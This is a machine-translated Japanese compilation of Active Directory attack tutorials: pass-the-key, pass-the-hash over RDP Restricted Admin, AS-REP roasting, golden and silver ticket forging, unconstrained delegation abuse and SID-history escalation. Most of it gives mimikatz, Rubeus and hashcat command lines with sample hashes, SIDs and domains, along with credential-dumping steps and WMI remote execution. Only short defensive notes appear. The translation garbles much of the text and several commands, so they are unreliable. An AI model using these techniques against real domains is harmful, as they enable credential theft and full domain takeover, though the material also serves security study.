キヌはドメむンでのみ䜿甚できたす。 AES暗号化をサポヌトするバヌゞョンには、KB2871997パッチがむンストヌルされたWin8.1/2012R2たたはWin7/2008r2/8/2012が含たれたす

䜿甚

AESキヌodj1o4mogdw2802.pngを取埗したす

次に、sekurlsa:3360pthモゞュヌルmimikatz 'privilege:3360debug' 'sekurlsa:pth /user:administrator /domain:god.orgを䜿甚したす/AES256:BF723755BC5F72A377BDA41CA58FD925DF7EE45DF9A026AC5CD3201020202E33 '1y3ezs2lbxv2803.png

Win7ホストにパッチが適甚されないため、パスは自然に倱敗したす。実甚的な環境では、PTHがRC4暗号化をサポヌトしおいない堎合、保護されたナヌザヌグルヌプにある可胜性がありたす。この時点で、AES128およびAES256暗号化をPTKに詊すこずができたす

リモヌトデスクトップ制限付き管理モヌドでハッシュを枡したす

2014幎、MicrosoftはKB2871997パッチをリリヌスしたした。これは、䞻にWindows 8.1およびWindows Server 2012 R2の匷化されたセキュリティ保護メカニズムをカバヌしおいたす。したがっお、Windows 7、Windows 8、Windows Server 2008R2、Windows Server 2012などの過去には、このパッチを曎新しお、䞊蚘のセキュリティ保護メカニズムを取埗するこずもできたす。

——3——3————335433333333333————————3354 ——3——3————335433333333333————————3354

制限付き管理者RDPモヌドリモヌトデスクトップクラむアントサポヌト

この曎新の前に、RDPログむンは、ナヌザヌがナヌザヌ名ずパスワヌドを提䟛した埌にのみアクセス可胜なむンタラクティブログむンでした。この方法でRDPホストにログむンするず、ナヌザヌの資栌情報がRDPホストのメモリに配眮され、ホストが脅かされおいる堎合、盗たれる可胜性がありたす。このアップデヌトにより、RDPはネットワヌクログむンをサポヌトできたす。ここでは、ナヌザヌの既存のログむントヌクンの認蚌をRDPアクセスのために枡すこずができたす。このログむンタむプを䜿甚しお、ナヌザヌの資栌情報がRDPサヌバヌに保存されおいないこずを確認したす。したがっお、資栌情報を保護したす

䞊蚘の説明を通しお、このモヌドはRDPを䜿甚しおログむンしたナヌザヌの資栌情報を保護するこずであるこずを理解できたす。ネットワヌク怜蚌のログむン方法により、RDPサヌバヌはナヌザヌの資栌情報を保存したせん。

䜿甚

Win8.1およびWin2012R2以䞊の制限された管理モヌドモヌドをサポヌトするず、Win8.1およびWin2012R2がデフォルトで有効になっおいたす。

条件クラむアントは制限付き管理モヌドモヌドをサポヌトし、サヌバヌは制限付き管理モヌドモヌドを有効にしたす

Win2012R2が手元にないため、ここでは2぀のWindows10がリモヌトデスクトップでハッシュを枡すために䜿甚されたす

最初にNTLMハッシュxcnb52eps132804.pngを取埗したす

Mimikatzを䜿甚しおNTLM HashPrivilege:3:Debugを最初に挿入しおデバッグ蚱可を有効にしたす。Sekurlsa3:3:pth /usekurlsa3:3:pth /user:administrator /domain:192.168.226.137 /NTLM:9C3767903480E04C089090D27123EAF9 '/RUN:MSTSC.EXE /RECTINTEDADMIN'

/ドメむンコンピュヌタヌ名たたはIPを指定したす

ここebf2sj3w4ik2805.pngでは、垞に資栌情報を必芁ずするこずを遞択しないでください

制限付き管理モヌドd4fjkluzezp2806.png

レゞストリを介しお開きたす0がオン、1はオフ、完党な管理者の特暩が必芁です、そしおRDP接続が再床実行されたす 'hklm \ system \ currentControlset \ control \ lsa' /v無効化

リモヌトホストで制限付き管理モヌドが有効になった埌、RDP接続はh0zqvqmj3pv2807.pngに成功したした

ハッシュがメモリyddty01oujy2808.pngに泚入されおいるのを芋るこずができたす

次に、管理者アカりントK0UAZを䜿甚したため、リモヌトデスクトップを䜿甚しおハッシュをパスするには、タヌゲットのロヌカル管理者蚱可のみが必芁です。

ただし、リモヌトデスクトップナヌザヌに参加するだけで、Administratrosグルヌプに参加しおいない堎合、このメカニズムは制限された管理者向けであるため、成功したせん。

as-repロヌスト

原理

AS_REPで、KDCはナヌザヌNTLMハッシュによっお暗号化されたセッションキヌを返したすセッションキヌは、クラむアントずTGS間の通信のセキュリティを確保するために䜿甚されたすmwinmgcbmap2809.png

RC4_HMAC暗号化モヌドでは、同じ暗号化プロセスを䜿甚しおプレヌンテキストパスワヌドを暗号化し、暗号化の結果を比范しお、ciphertextが同じかどうかを評䟡しおブラスト結果を決定できたす。

䞊蚘の図に返されたナヌザヌによっお暗号化されたナヌザヌNTLMハッシュのセッションキヌ暗号文は、AES256を介しお暗号化されおいたすが、ここで暗号化ダりングレヌド方法を䜿甚するこずもできたす以䞋のKerberoastは、AES暗号化ずRC4_HMACタむプのデヌタを返すためにAES暗号化ずRC4_HMACタむプのデヌタを返したす。 as_repでciphertextの暗号化方法がRC4_HMACであるように、プレヌンテキストパスワヌドをクラックできるようにしたす。

ただし、ここで解決する必芁がある問題の1぀は、認蚌前の問題です。 AS_REQでは、クラむアントハッシュ暗号化を備えたタむムスタンプが生成され、KDCに送信されたす。 KDCは、暗号文を埩号化するこずによりタむムスタンプを取埗したす。埩号化が成功し、タむムスタンプが5分以内にある堎合、事前認蚌は成功したす。 KDCは、この方法を䜿甚しお、ブルヌトフォヌスの亀裂を効果的に防ぐために、クラむアントのアむデンティティを怜蚌したす。yfppzmderba2810.png ln2ql0vs0j52811.png

AS_REQがデフォルトで2回送信される理由に぀いおは、Harmj0yの蚘事から埗られた説明は、クラむアントが事前にサポヌトされおいる暗号化方法を知らないずいうこずですクラむアントは、事前認蚌のタむムスタンプの暗号化方法を知らないこずに固有のものだず思いたす。

したがっお、事前認蚌をオフにするこずで、培底的な爆砎を実行しお、プレヌンパスワヌドama041lyasw2812.pngをクラックするこずができたす

事前認蚌を終了した埌、2番目のAS_REQはありたせん。唯䞀のAS_REQには、NTLMハッシュ暗号化タむムスタンプCiphertext 3g0jkdf3fvqe2813.pngが含たれたせん。

䜿甚

LDAPを介しおKerberos Prauthentication属性を必芁ずしないドメむンナヌザヌをク゚リするこずができたす

特定のク゚リ条件は、useraccountcontrol:1.2.840.113556.1.4.803:=4194304です

ここでルベりスはサンプルrubeus.exe asreproast /nowrap /format:hashcat 0veljxzcn4q2814.pngずしお䜿甚されたす

Hashcat Decrypt Hashcat -M 18200 Hash.txt Passwords.Dict - Force xxpjw40onln2815.png

Rubeus AsReproast原理分析

トラフィックのワむアシャヌク分析を通じお、このモゞュヌルの原則は、LADPを介しお属性機胜のドメむンナヌザヌを照䌚し、バッチでAS_REQリク゚ストパケットを送信し、ハッシュカットブラストに適したフォヌマットず出力のためのリタヌンパケットのNTLMハッシュ暗号化郚分を抜出するこずであるこずがわかりたす。

LDAPク゚リu2mkwuxtfkv2816.png

サポヌトされおいる暗号化タむプはRC4_HMAC kx5wzk5vsce2817.pngのみであるこずを指定したす

返された暗号文は、RC4_HMACを䜿甚しお暗号化されおいたすしたがっお、培底的に爆砎できたすphikgg5wmbe2818.png

ゎヌルドノヌト

機胜

DCず通信する必芁がありたすASず察話する必芁はありたせんが、TGSする必芁はありたせんが、TGSする必芁はありたせん。暗号化しおTGTを生成したす。 KRBTGTのNTLM-HASH倀を取埗した堎合、TGTを停造できたすか KRBTGTはドメむンコントロヌラヌでのみ利甚可胜であるため、ゎヌルドの資栌情報を䜿甚するず、以前にドメむンコントロヌラヌでアクセス蚱可を取埗したこずがあり、金の資栌情報はバックドアずしお理解できたす。

原理

1。ドメむン名

2。ドメむンのSID倀

3.ドメむンのKRBTGTアカりントパスワヌドハッシュ

4.停装されたナヌザヌ名は任意の堎合がありたすTGTのサヌビス寿呜は20分以内であり、ドメむンコントロヌラヌKDCサヌビスはTGTのナヌザヌアカりントを確認したせん

Krbtgtのハッシュを取埗したら、それを䜿甚しおゎヌルドノヌトを䜜成できたす

DCSYNCの攻撃方法以䞋で説明および緎習を通じおKRBTGTのハッシュを取埗したずしたす1rgq30d0wjq2819.png

条件1SPNをスキャンしおドメむン名God.org sa4wehbvzxg2820.pngを取埗する

条件2whoami /すべおドメむンナヌザヌSIDを取埗し、ドメむンSID 3ansv2xpwdt2821.pngの最埌の文字列を削陀したす

条件3KRBTGTアカりントHASH58E91A5AC358D86513AB24312314061

条件4Forgeナヌザヌ名管理者

条件

MIMIKATZ KERBEROS:3:GOLDEN FORGED TGTを䜿甚したす

ゎヌルデンチケットデフォルトグルヌプ

ドメむンナヌザヌSIDS-1-5-21ドメむン-513

ドメむン管理SIDS-1-5-21ドメむン-512

アヌキテクチャ管理者SIDS-1-5-21ドメむン-518

゚ンタヌプラむズ管理者SIDS-1-5-21ドメむン-519フォレッドルヌトドメむンに鍛造チケットが䜜成された堎合にのみ有効ですが、ADフォレスト管理者の蚱可に䜿甚/SIDSパラメヌタヌを远加

グルヌプポリシヌ䜜成者の所有者SIDS-1-5-21ドメむン-520

mimikatz.exe 'kerberos:3360golden /domain:god.org /sid3:s-1-5-21-2952760202-1353902439-2381784089 /usersistrator /KRBTGT:58E91A5AC358D86513AB24312314061 /TICKET:K0U.KIRIBI '出口

TIP:は、請求曞の有効期間ず曎新請求曞の最倧劥圓性期間を倉曎するために、远加/endin:xx /rengingmax:xxを远加できたす。 Mimikatzはデフォルトで10幎wea4byfkb312822.pngです

生成されたチケットは、他のドメむンマシンにむンポヌトできたす。たたは、TGTを /PTTを䜿甚しおメモリに盎接泚入できたす。

最初にチケットキャッシュKlist Purge 02u3lygbzh52823.pngをクリアしたす

次に、mimikatzkerberos:ptt k0u.kiribi nwfnto00x3k2824.png経由でキャッシュされた請求曞に泚入したす

KLISTはチケットキャッシュをチェックし、停造されたTGTを芋るこずができたす

HireHackking

0x00はじめに

Active DirectoryがWindows 2000サヌバヌで最初にリリヌスされたずき、MicrosoftはKerberosを介しおWebサヌバヌを認蚌するナヌザヌをサポヌトする簡単なメカニズムを提䟛し、バック゚ンドデヌタベヌスサヌバヌのレコヌドを曎新するための蚱可を必芁ずしたす。これは倚くの堎合、Kerberos double-Hopの問題ず呌ばれ、デヌタベヌスレコヌドを倉曎するずきにWebサヌバヌがナヌザヌ操䜜をシミュレヌトできるようにするために代衚団が必芁です。

Visio的KerberosDoubleHop-的Visio

0x01 Kerberos制玄のない代衚団Kerberosの制玄のない委任

Microsoftは、Windows 2000にKerberosの「制玄のない委任」機胜を远加したした。ドメむン管理者は、2番目のチェックボックスをチェックするこずでこの委任レベルを有効にするこずができたす。 3番目のチェックボックスは、「制玄付き委任」に䜿甚されたす。これには、特定のKerberosサヌビスを委任が有効になっおいるコンピュヌタヌにリストする必芁がありたす。

KerberosUnConstrainedDelegation-代衚团-Configäž­

Powershellは、Kerberosの制玄のない代衚団を芋぀けたす。

Active Directory PowerShellモゞュヌルを䜿甚したGet-AdComputerは、Kerberosの制玄のないコンピュヌタヌを䜿甚する方が簡単であるこずがわかりたした。

制玄のない代衚者TrustedFordElegation=True

制玄付き委任信頌できるaauthfordelegation=true

KerberosUnConstrainedDelegation-PowerShell的DiscoverServers2

0x02 Kerberos通信プロセス

暙準のKerberosコミュニケヌションプロセスに埓っお、Kerberosの仕組みを説明する簡単な䟋

ナヌザヌ名ずパスワヌドでナヌザヌログむン

1a。パスワヌドはNTLMハッシュに倉換され、タむムスタンプはハッシュで暗号化され、認蚌チケットTGTリク゚ストAS-REQ1Bの認蚌機ずしおKDCKey Allocation Centerに送信されたす。ドメむンコントロヌラヌKDCは、ナヌザヌ情報ログむン制限、グルヌプメンバヌなどをチェックし、チケットグラントチケットTGTを䜜成したす。TGTは暗号化されお眲名され、ナヌザヌに送信されたすAS-REP。ドメむン内のKerberosサヌビスKRBTGTのみがTGTデヌタを開いお読み取るこずができたす。3。チケット助成金サヌビスTGSチケットTGS-REQが芁求されるず、ナヌザヌはTGTをDCに送信したす。 DCはTGTおよびVerifys PAC怜蚌を開きたす--- DCがチケットを開けおチェックサムチェックを開くこずができる堎合、TGTが有効であり、TGTのデヌタが効果的にコピヌされおTGSチケット4が䜜成されたす。 ap-req。

このサヌビスは、NTLMパスワヌドハッシュを䜿甚しおTGSチケットを開きたす。 KerberosがTGS-REQで参照されおいるサヌビスプリンシパル名ステップ3で指定されたサヌビスをホストするサヌバヌでKerberosの制玄のない代衚団が有効になるず、DCコントロヌラヌのドメむンコントロヌラヌはナヌザヌのTGTコピヌをサヌビスチケットに保存したす。ナヌザヌのサヌビスチケットTGSがサヌビスアクセスのためにサヌバヌに提䟛されるず、サヌバヌはTGSを開き、将来の䜿甚のためにナヌザヌのTGTをLSASSに配眮したす。アプリケヌションサヌバヌは、このナヌザヌ操䜜を制限なくシミュレヌトできるようになりたした

泚アプリケヌションサヌバヌ「Kerberos Constrained」を構成するために

ドメむン管理者たたぱンタヌプラむズ管理者である委任」は、この蚭定をドメむンのコンピュヌタヌアカりントに蚭定する必芁がありたす。この蚱可は他のグルヌプに委任できるため、Active Directoryのナヌザヌ蚱可を承認するこずに泚意しおください。

Visio的KerberosUnconstrainedDelegation-的Visio

0x03制玄のない委任は資栌情報を盗みたす

攻撃者ずしお、Kerberosの制玄のない代衚団のサヌバヌが芋぀かったら、次のステップは次のずおりです。

1.管理者たたはサヌビスアカりントを介しおサヌバヌを攻撃したす。

2。゜ヌシャル゚ンゞニアリングを介しおドメむン管理者を䜿甚しおサヌバヌ䞊の任意のサヌビスに接続し、制玄のない委任蚱可を持っおいたす。

3.管理者がこのサヌビスに接続するず、管理者のTGSサヌビスチケットTGTを䜿甚がサヌバヌに送信され、LSASSに保存され、将来的に容易に䜿甚されたす。

KerberosUnConstrainedDelegation-Mimikatz-祚证出口-LS-TGT-TicketDetail2

4。ドメむン管理者認蚌TGTチケットは、抜出しお再利甚できたすチケットが有効になるたで。

KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2

5.このチケットは、ドメむンkrbtgtアカりントパスワヌドハッシュドメむン管理者が挏れおいる堎合を取埗するためにすぐに䜿甚できたす。

KerberosUnConstrainedDelegation-PSRemote-ADSDC02-Mimikatz-KRBTGT2

0x04防衛枬定

1。KERBEROSCONSTRAINES DERIOGATION PREMISSIONSを䜿甚しないでください-----委任のために制玄された委任を必芁ずするサヌバヌを構成する2。 Windows Server 2012 R2ドメむン機胜レベルから提䟛される「プロテクションナヌザヌ」グルヌプも、このグルヌプのアカりントが委任を蚱可しおいないため、この問題を軜枛するこずもできたす。

泚保護されたナヌザヌのグルヌプアカりントがWindowsにアップグレヌドされたずき

サヌバヌ2012 R2ドメむン機胜レベルの堎合、ドメむンコントロヌラヌベヌスの保護が自動的に適甚されたす。 Windowsサヌバヌ甚

2012 R2ドメむンで認蚌された保護されたナヌザヌグルヌプのメンバヌは、次のアむデンティティで認蚌できなくなりたす。デフォルトの資栌情報委任CREDSSPプレヌンテキストのパスワヌド資栌情報は、Allow Delegationのデフォルトの資栌情報蚭定が有効になっおいおもキャッシュされたせん。

Windows DigestWindows Digestが有効になっおいおも、プレヌンテキストのパスワヌド資栌情報はキャッシュされおいたせん。

NTLMnt䞀方向関数の結果ntowfはキャッシュされたせん

Kerberosの長期キヌKerberosの初期TGT芁求のキヌは通垞キャッシュされるため、認蚌芁求は䞭断されたせん。このグルヌプのアカりントの堎合、Kerberosプロトコルは各リク゚ストの認蚌を怜蚌したす。

オフラむンログむンログむン時にキャッシュされた怜蚌プログラムは䜜成されたせん

HireHackking

0x01シルバヌチケット定矩

シルバヌチケットは、Kerberosチケット助成サヌビスTGSを停造したチケットであり、サヌビスチケットずも呌ばれたす。䞋の図に瀺すように、AS-REQずAS-REPステップ1および2はなく、ドメむンコントロヌラヌずのTGS-REQ/TGS-REPステップ3および4通信はありたせん。請求曞は停造されたTGSであるため、ドメむンコントロヌラヌず通信したせん。

uw4jufq3bir9164.png

0x02シルバヌノヌトの機胜

1。シルバヌノヌトは有効なノヌトグラントサヌビスTGSKerberosノヌトです。これは、Kerberos怜蚌サヌビスが実行する各サヌバヌがサヌビスを暗号化および眲名しおいるためです。

2。ゎヌルドノヌトはTGTを停造され、Kerberosサヌビスのために効果的に取埗され、シルバヌノヌトはTGSを停造しおいたす。これは、シルバヌノヌトが特定のサヌバヌ䞊の任意のサヌビスに限定されるこずを意味したす。

3.ほずんどのサヌビスはPACを怜蚌したせんPACチェックサムをPAC怜蚌のためにドメむンコントロヌラヌに送信するこずで。

4.攻撃者はサヌビスアカりントのパスワヌドのハッシュ倀を必芁ずしたす

5。TGSは停造されおいるため、TGTず通信したせん。぀たり、DCが怜蚌されおいたす。

6.任意のむベントログはタヌゲットサヌバヌ䞊にありたす。

0x03createシルバヌノヌト

シルバヌノヌトを䜜成たたは鍛造するには、攻撃者はタヌゲットサヌビスアカりントのパスワヌドハッシュ倀を取埗する必芁がありたす。タヌゲットサヌビスが䜿甚されおいるアカりントMS SQLなどの䞋で実行されおいる堎合、サヌビスアカりントのパスワヌドハッシュは、玙幣を䜜成するために必芁です。 kerberoasthttps://github.com/nidem/kerberoastを䜿甚した亀裂サヌビスアカりントのパスワヌドは、タヌゲットサヌビスに関連するパスワヌドデヌタを識別するための効果的な防止です。コンピュヌタヌホスティングサヌビスも最も䞀般的なサヌビスであり、Windowsファむル共有を利甚する「CIFS」サヌビスです。コンピュヌタヌ自䜓がこのサヌビスをホストするため、シルバヌノヌトの䜜成に必芁なパスワヌドデヌタは、関連するコンピュヌタヌアカりントのパスワヌドハッシュ倀です。コンピュヌタヌがActive Directoryに結合されるず、新しいコンピュヌタヌアカりントオブゞェクトが䜜成され、コンピュヌタヌに远加されたす。パスワヌドず関連するハッシュハッシュは、アカりントを所有するコンピュヌタヌに保存され、NTLMパスワヌドハッシュはドメむンのドメむンコントロヌラヌのActive Directoryデヌタベヌスに保存されたす。攻撃者がコンピュヌタヌで管理暩を取埗したり、ロヌカルシステムずしおコヌドを実行できる堎合、攻撃者はMimikatzを䜿甚しお広告コンピュヌタヌアカりントのパスワヌドをシステムからダンプできたすNTLMパスワヌドハッシュはRC4 Kerberosチケットを暗号化するために䜿甚されたす

Mimikatz "Privilege:3360Debug" "sekurlsa:3360logonpasswords" #requires管理者の蚱可

2i5x0gn1c4j9165.png

0x04 Mimikatz Silver Notes泚文

/ドメむン - lab.adsecurity.orgなどの完党なドメむン名

/SID - S-1-5-21-1473643419-774954089-2222329127などのドメむンのSID

/ナヌザヌ - ドメむンナヌザヌ名

/groupsオプション - ナヌザヌが属するグルヌプは

/チケットオプション - 埌で䜿甚するためにゎヌルデンチケットファむルを保存するパスず名前を提䟛するか、 /PTTを䜿甚しお金ノヌトをメモリに挿入しおすぐに䜿甚したす

/PTT- /チケットの代替品ずしお、それを䜿甚しお、䜿甚のために停のチケットをメモリに即座に挿入したす。

/IDオプション - ナヌザヌRID、MIMIKATZデフォルト倀は500デフォルトの管理者アカりントRIDです

/startoffsetoptional - チケットが利甚可胜なずきにオフセットを開始したす通垞、このオプションを䜿甚する堎合は-10たたは0に蚭定mimikatzデフォルト倀は0です

/Endinオプション - チケットの有効性時間、Mimikatzデフォルト倀は10幎、アクティブディレクトリのデフォルトKerberosポリシヌは10時間に蚭定されおいたす

/RENEWMAXオプション - 曎新の最倧劥圓性時間を曎新する、Mimikatzデフォルト倀は10幎、アクティブディレクトリのデフォルトKerberosポリシヌは最倧7日間に蚭定

1。銀の請求曞に必芁なパラメヌタヌ

/タヌゲット - タヌゲットサヌバヌのFQDN

FQDN 完党資栌のあるドメむン名完党資栌のドメむン名ホスト名ずドメむン名の䞡方を備えた名前。 シンボル "。"

/サヌビス - タヌゲットサヌバヌで実行されおいるKerberosサヌビス、サヌビスプリンシパルネヌムタむプはCIF、HTTP、MSSQLなどです。

/RC4 - サヌビスのNTLMハッシュコンピュヌタヌアカりントたたはナヌザヌアカりント

2。シルバヌビルデフォルトグルヌプ

ドメむンナヌザヌSIDS-1-5-21ドメむン-513

ドメむン管理SIDS-1-5-21ドメむン-512

アヌキテクチャ管理者SIDS-1-5-21ドメむン-518

゚ンタヌプラむズ管理者SIDS-1-5-21ドメむン-519

グルヌプポリシヌ䜜成所有者SIDS-1-5-21ドメむン-520

3。シルバヌノヌトを䜜成するミミカッツコマンド

次のMimikatzコマンドは、サヌバヌADSMSWIN2K8R2.lab.adsecurity.orgでCIFSサヌビスのシルバヌノヌトを䜜成したす。シルバヌチケットを正垞に䜜成するには、ADSMSWIN2K8R2.lab.adsecurity.orgの広告コンピュヌタヌアカりントパスワヌドのハッシュを取埗するために、ADドメむンダンプたたはロヌカルシステムでMimikatzを実行する必芁がありたす。 NTLMパスワヌドハッシュは、RC4パラメヌタヌで䜿甚されたす。サヌビスSPNタむプも /サヌビスパラメヌタヌで識別する必芁がありたす。タヌゲットコンピュヌタヌのFQDAは、 /SIDパラメヌタヌの /タヌゲットパラメヌタヌずドメむンSIDで䜿甚する必芁がありたす。コマンドは次のずおりです。

Mimikatz "Kerberos:3360Golden /user:lukeskywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-777749494089-22229127 /target:Adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt "exit

yckhbq4dket9166.png

0x05さたざたなサヌビスのシルバヌノヌトの実際のリスト

1。シルバヌノヌトのサヌビスリスト

サヌビスタむプ

サヌビスシルバヌチケット

WMI

ホスト

RPCSS

Powershell

リモヌト

ホスト

http

winrm

ホスト

http

スケゞュヌル

タスク

ホスト

Windows

ファむル共有CIFS

CIF

ldap

を含む操䜜

ミミカッツdcsync

ldap

Windows

リモヌトサヌバヌ管理ツヌル

RPCSS

ldap

CIF

2。 Windows共有CIFS管理アクセスノヌト

タヌゲットコンピュヌタヌのWindows共有の管理暩を取埗するための「CIFS」サヌビスのシルバヌノヌトを䜜成したす。

CIFSシルバヌチケットを泚入した埌、タヌゲットコンピュヌタヌの共有にアクセスできるようになりたした。

c $共有、共有ファむルにファむルをコピヌできたす。

ff1b2r2bhht9167.png

3。Windowsコンピュヌタヌホスト管理者の暩利を備えたシルバヌノヌト

タヌゲットコンピュヌタヌでカバヌされおいるWindowsサヌビスの管理者の暩利を取埗するための銀行メモを䜜成したす。これには、スケゞュヌルされたタスクを倉曎および䜜成するための暩限が含たれたす。

ey1qkel3yd49168.png

ホストシルバヌチケットを䜿甚するず、新しい蚈画タスクを䜜成できたす。

chcusqkligl9169.png

たたは、ホストシルバヌチケットを掻甚するこずにより、既存の蚈画されたタスクを倉曎できたす。

z5foatufz3d9170.png

x4ojxdve5y19171.png

「HTTP」サヌビスず「WSMAN」サヌビスのシルバヌチケットを䜜成しお、タヌゲットシステムをリモヌトするWINRMおよびOR PowerShellの管理暩限を取埗したす。

ln5jspuf1zj9172.png

wszrfw5bavo9173.png

2぀のHTTPWSMANシルバヌノヌトを泚入した埌、PowerShellを䜿甚しおリモヌトたたはWinRMを䜿甚しおタヌゲットシステムシェルをバりンスできたす。たず、New-PssessionはPowerShellを䜿甚しお、リモヌトシステムぞのセッション甚のPowerShell CMDLETを䜜成し、EnterPSSessionがリモヌトシェルを開きたす。

bfvccshzwjv9174.png

21tdw35an009175.png

5。シルバヌの請求曞の蚌拠は、管理者の暩利を備えたWindowsコンピュヌタヌのLDAPに接続されおいたす

タヌゲットシステムを取埗するための「LDAP」サヌビスのシルバヌチケットを䜜成したすアクティブを含む

ディレクトリ䞊のLDAPサヌビスの管理暩。

m31lcfwnlfi9176.png

LDAPシルバヌチケットを䜿甚するず、LDAPサヌビスにリモヌトにアクセスしおKRBTGTに関する情報を取埗できたす。

s1yf5cdum1z9177.png

泚lsadump:dcsync

同期オブゞェクトに぀いおDCに質問を開始したすアカりントのパスワヌド情報を取埗できたす。必芁な蚱可には、管理者、ドメむン管理者、゚ンタヌプラむズ管理者、およびドメむンコントロヌラヌのコンピュヌタヌアカりントが含たれたす。読み取り専甚ドメむンコントロヌラヌでは、デフォルトでナヌザヌパスワヌドデヌタを読み取るこずができたせん。

6。シルバヌメモの蚌拠は、管理者の暩利を備えたWindowsコンピュヌタヌのWMIに接続されおいたす

WMIを䜿甚しおタヌゲットシステムでコマンドをリモヌトで実行する「ホスト」サヌビスず「RPCSS」サヌビスのシルバヌノヌトを䜜成したす。

irhluovmnd19178.png

これらのシルバヌノヌトを泚入した埌、Kerberos TGSノヌトが「KLIST」を実行しおメモリ内のシルバヌノヌトに泚入されおいるこずを確認できたす。WMICを呌び出したり、タヌゲットシステムでコマンドを実行したりするために「被隓者」を介しおInvoke-Wmimethodができたす。

z2cfqdaeoqh9179.png

Invoke -Wmimethod win32_process -computername $ computer

-credential $ creds -name create -argumentlist "$ runcommand"

yoi5ek44w5j9180.png

7。ドメむン制埡に「CIFS」サヌビスリストにアクセス

たず、次の情報を取埗する必芁がありたす。

/ドメむン

/sid

/タヌゲット:タヌゲットサヌバヌのドメむン名のフルネヌム、ドメむンコントロヌルのフルネヌムは次のずおりです。

/サヌビスタヌゲットサヌバヌのKerberosサヌビス、CIFSは次のずおりです

/RC4コンピュヌタヌアカりントのNTLMハッシュ、ドメむン制埡ホストのコンピュヌタヌアカりント

/ナヌザヌ停造されるナヌザヌ名、ここでは銀をテストできたす

ドメむンコントロヌルで次のコマンドを実行しお、ドメむンコントロヌルホストのロヌカル管理者アカりントを取埗したす。

ミミカッツログ

'sekurlsa:3360logonpasswords'

図:に瀺すように

54sieji5frn9181.png

泚蚘

ここでは、コンピュヌタヌアカりント、぀たりナヌザヌ名: win-8vlrpiajb0 $のntlmハッシュを芋぀ける必芁がありたす。別のアカりントの堎合、倱敗したす。぀たり、サヌビスアカりントを共有する必芁がありたす。

䞊蚘の情報は次のずおりです。

/domain:test.local

/SID:S-1-5-21-4155807533-921486164-2767329826

/target:win-8vvlrpiajb0.test.local

/service3360cifs

/RC4:D5304F9EA69523479560CA4EBB5A2155

/user3360Silver

Mimikatzを䜿甚しおシルバヌチケットをむンポヌトしたす

ミミカッツ

'kerberos:golden /domain:test.local

/SID:S-1-5-21-4155807533-921486164-2767329826

/target:win-8vvlrpiajb0.test.local /service:cifs

/RC4:D5304F9EA69523479560CA4EBB5A2155 /USER:SILVER /PTT '

図に瀺すように、この時点でドメむンコントロヌルのファむル共有に正垞にアクセスできたす。

23a3shupmfq9182.png

HireHackking

0x01ゎヌルドノヌトの原則ず条件

ゎヌルドノヌトは、停造ノヌトグラントノヌトTGTであり、認定ノヌトずしおも知られおいたす。䞋の図に瀺すように、ドメむンコントロヌラヌずのAS-REQたたはAS-REPステップ1および2の通信はありたせん。ゎヌルドノヌトはForged TGTSであるため、サヌビスノヌトを取埗するためにTGS-REQの䞀郚ずしおドメむンコントロヌラヌに送信されたす。u1woop3qzea9155.png

Kerberos Gold Notesは、ドメむンKerberosアカりントKRBTGTによっお暗号化および眲名されおいるため、有効なTGT Kerberosノヌトです。 TGTは、ナヌザヌが他のドメむンコントロヌラヌによっお認蚌されおいるこずをドメむンコントロヌラヌ䞊のKDCサヌビスに蚌明するためにのみ䜿甚されたす。 TGTはKrbtgtパスワヌドハッシュによっお暗号化され、ドメむン内の任意のKDCサヌビスによっお埩号化できたす。

金の条件ず芁件

1.Domain名[広告PowerShellモゞュヌル get-addomain.dnsroot]

2。ドメむンのSID倀[AD PowerShellモゞュヌル get-addomain.domainsid.value]

3.ドメむンのKRBTGTアカりントNTLMパスワヌドハッシュ

4。Forgeナヌザヌ名

攻撃者がドメむンコントロヌラヌにアクセスする管理者の蚱可を埗るず、Mimikatzを䜿甚しおKRBTGTアカりントパスワヌドのハッシュを抜出できたす。

d1qh5y1qfro9156.png

0x02ゎヌルドノヌトの制限

ゎヌルドは、Krbtgtアカりントのパスワヌドハッシュがマルチドメむン広告の森の䞀郚ずしおサブドメむンに衚瀺されるずきに存圚する珟圚のドメむンの管理暩限を「スプヌフィング」したす。ルヌトドメむンには、森林管理グルヌプ゚ンタヌプラむズ管理者党䜓が含たれおいるためです。 Mimikatzは盞察識別子RIDを介しおグルヌプメンバヌシップをチケットに远加するため、Kerberosチケットの519゚ンタヌプラむズマネゞメントRIDは、䜜成するドメむンのロヌカルずしお識別されたすKRBTGTアカりントドメむンに基づく。ドメむンSIDず接続されたRIDを取埗しお䜜成されたドメむンセキュリティ識別子SIDが存圚しない堎合、Kerberosチケットの所有者はそのレベルでアクセスを受け取りたせん。蚀い換えれば、マルチドメむン広告森林では、金色が䜜成されおいる堎合

チケットドメむンにぱンタヌプラむズ管理者グルヌプが含たれおいたせんが、ゎヌルデン

チケットは、森林の他のドメむンに管理暩限を提䟛したせん。単䞀のドメむンActive Directory Forestでは、゚ンタヌプラむズ管理者グルヌプがこのドメむンに存圚するため、ゎヌルデンチケットを䜜成するこずに制限はありたせん。䞋の図に瀺すように、゚ンタヌプラむズ管理者でない限り、金のメモをクロスドメむントラストを䜿甚するこずはできたせん。暙準的なゎヌルドノヌトは、䜜成するサブドメむンに限定されおいたす

zyqjnaxrnop9157.png

0x03ゎヌルドノヌトの制限をバむパス

移行スキヌムでは、DomainaからDomainBに移行するナヌザヌは、元のDomainaナヌザヌSID倀を新しいDomainBに远加したす

SID History Property。ナヌザヌが新しいアカりントでDomainBにログむンするず、Domaina SIDは、アクセスを決定したDomainBナヌザヌグルヌプで怜蚌されたす。これは、SIDをSID履歎に远加しおアクセスを拡匵できるこずを意味したす。

MimikatzがSIDの歎史をゎヌルデンチケットおよび銀のチケットでサポヌトするず、事態はさらに興味深いものになりたす。ADForestのどのグルヌプも含めお、蚱可されたアクセスに䜿甚できるからです。 Mimikatzの最新バヌゞョンを䜿甚するず、Forest Enterprise Admins GroupのゎヌルデンチケットにSID履歎を远加できるようになりたした。単䞀のドメむン名のkrbtgtアカりントのパスワヌドハッシュが取埗されるず、ナヌザヌはゎヌルデンノヌトを介しおフォレスト党䜓にログむンしたす。党䜓ずしお、ドメむン名が脅かされるず。金のチケットは、マむクロコンピュヌタヌ広告フォレストkfse0f31hnd9158.pngの任意のドメむンで䜿甚できるようになりたした。

泚アクティブなディレクトリフォレストの信蚗間のSIDフィルタリングを有効にするず、ゎヌルドノヌトの制限のバむパスが劚げられたす。

0x04ゎヌルドノヌトの機胜

